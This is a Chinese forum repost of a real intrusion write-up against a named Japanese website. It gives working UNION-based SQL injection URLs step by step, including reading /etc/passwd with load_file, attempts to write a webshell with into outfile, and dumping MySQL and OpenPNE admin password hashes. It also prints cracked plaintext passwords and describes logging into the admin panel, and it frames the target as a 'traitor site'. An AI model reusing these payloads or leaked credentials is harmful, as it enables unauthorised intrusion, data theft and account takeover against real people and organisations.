原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

0x01. 检测 www.zuaa.jp 收集数据


whatweb

2 L8 r$ w1 j4 H4 @4 _2 D1 }
利用NMAP扫描

  b( M% Z* g  x中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
9 N9 M1 a! m' |5 M1 ]7 g0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390


4 y5 j1 L  W# d& u0 }0x03.order by
6 ^5 |. }( q6 e2 y. W. f             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
) E  i7 @8 H* K$ o2 G% m
order by 28报错，order by 27正常

0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示

! |1 K9 H: f: ^中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x05. info:
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

* v( [6 F9 c8 _* @0 nuser:            root@localhost
, v7 j, W! u  g- c5 i8 d1 Ddatabase:    openpne
. R( t& J5 m0 O# {version:      4.1.22
: e* P/ q2 b6 s  L. K# Y( V' ros:             portbld-freebsd5.4
! A3 c& ?% [+ u8 R' v+ Q$ i+ a0 Y
7 W+ Y& ]) p* `6 _7 v3 c7 A! i; l1 t0x06. root用户
' y( C2 f" t$ j/ `利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
* f$ B9 S3 j9 I! Z5 n& U
9 @* }( }) B  m& [& d# V3 i通过工具转换
" K9 }5 W# o; ]  o4 p- D5 Y  N
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
; y7 ]+ Z7 a; p0 R$ r% M9 X
* C+ Y+ c; F/ I0x07. 利用 into outfile
全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

" E' X- d' k3 ?页面显示“MDB2 Error:syntax error”

0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
/ F. s+ f3 _  H' d& O9 y7 C+ k& [0 [/ ?


; @  O: C- |7 [- D; L. r0x09. 查找后台
5 c# a4 y6 _% g5 s: ~! K! k利用 现有的各种 后台工具尝试都不行
; Q, V+ ?6 w# @5 {. N+ A: ]. k
. F9 c0 y" C0 L0 x2 ?) w0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
0 U5 b1 b9 q& ~可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
0 q6 m) V  O% M3 O
2 V! a6 x* g: G2 v9 I这个可以在 www.cmd5.com 解密
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
: z, H# t+ @  l6 R1 q& J% ]; jopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
  j9 `6 |& ~5 l工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
6 ~5 d6 _1 J1 ]

9 X* I2 k) q2 n" ~7 q' F0x11. 网站突破
7 W+ s- a. B# L发现网站的源程序 openpne, google 下载 openpne 源码

2 \- C$ E0 l. I  m. I) L, U
/ [# a$ _4 A) G0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login
4 T: {: x7 m6 t: Q7 R0 G3 i
表名 (c_admin_user) ，字段名（username,password）
! M3 S/ L9 R  f& ]8 K! ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

解密
: V: F* N0 D# r6 G: J! K5 Uzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
9 F  v$ B$ T( U* ]5 Fzuaajp:c0923ec5857796a393da99905008c176,          zju1897

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x13. 登录后台
- E; \6 t0 D" V6 j4 a7 N
& u$ u* A# [% X0 y' c

0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
: p9 ~9 C+ E6 j中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0 k* o  t" W$ b最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
" k+ p4 I4 |6 [

荒村狂客

哪个牛人 费的这劲 入侵的